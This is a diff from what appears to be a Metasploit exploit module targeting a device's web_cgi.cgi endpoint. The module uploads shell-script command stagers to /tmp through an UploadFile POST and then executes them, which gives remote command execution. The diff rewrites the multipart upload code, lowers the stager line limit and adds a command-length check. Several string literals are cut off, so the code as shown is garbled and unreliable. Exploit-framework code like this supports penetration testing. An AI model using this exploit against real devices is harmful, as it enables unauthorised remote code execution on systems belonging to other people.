@@ -83,7 +83,7 @@ def exploit
8383 @counter = 1
8484 execute_cmdstager (
8585 :flavor => :echo ,
86- :linemax => 99 #limited by our upload, larger payloads crash the web server
86+ :linemax => 95 #limited by our upload, larger payloads crash the web server
8787 )
8888
8989 print_status ( "#{ peer } )
@@ -108,21 +108,22 @@ def execute_command(cmd,opts)
108108 #upload our stager to a shell script
109109 #upload takes quite long because there is no response from the web server
110110
111- data_cmd = "------------------------------9bcdb049f0d2\r \n "
112- data_cmd << "Content-Disposition: form-data; name=\" name\" ; filename=\" #{ @counter } \" \r \n "
113- data_cmd << "Content-Type: application/octet-stream\r \n \r \n "
114- data_cmd << "#!/bin/sh\n "
115- data_cmd << cmd
116- data_cmd << "\n ------------------------------9bcdb049f0d2--"
111+ file_upload = "#!/bin/sh\n "
112+ file_upload << cmd << "\n "
113+
114+ post_data = Rex ::MIME ::Message . new
115+ post_data . add_part ( file_upload , nil , "binary" , "form-data; name=\" xxx\" ; filename=\" #{ @counter } \" " )
116+ post_data . bound = "-9bcdb049f0d2--"
117+ file = post_data . to_s
117118
118119 @counter = @counter + 1
119120
120121 begin
121122 send_request_cgi ( {
122123 'method' => 'POST' ,
123124 'uri' => "/web_cgi.cgi?&request=UploadFile&path=/tmp/" ,
124- 'ctype' => "multipart/form-data; boundary=----------------------------9bcdb049f0d2 " ,
125- 'data' => data_cmd
125+ 'ctype' => "multipart/form-data; boundary=#{ post_data . bound } ,
126+ 'data' => file
126127 } )
127128 rescue ::Rex ::ConnectionError
128129 fail_with ( Failure ::Unreachable , "#{ peer } )
@@ -131,6 +132,7 @@ def execute_command(cmd,opts)
131132 end
132133
133134 def execute_final_command ( cmd )
135+ fail_with ( Failure ::Unknown , "#{ peer } ) if cmd . length > 18
134136 begin
135137 send_request_cgi ( {
136138 'method' => 'GET' ,
0 commit comments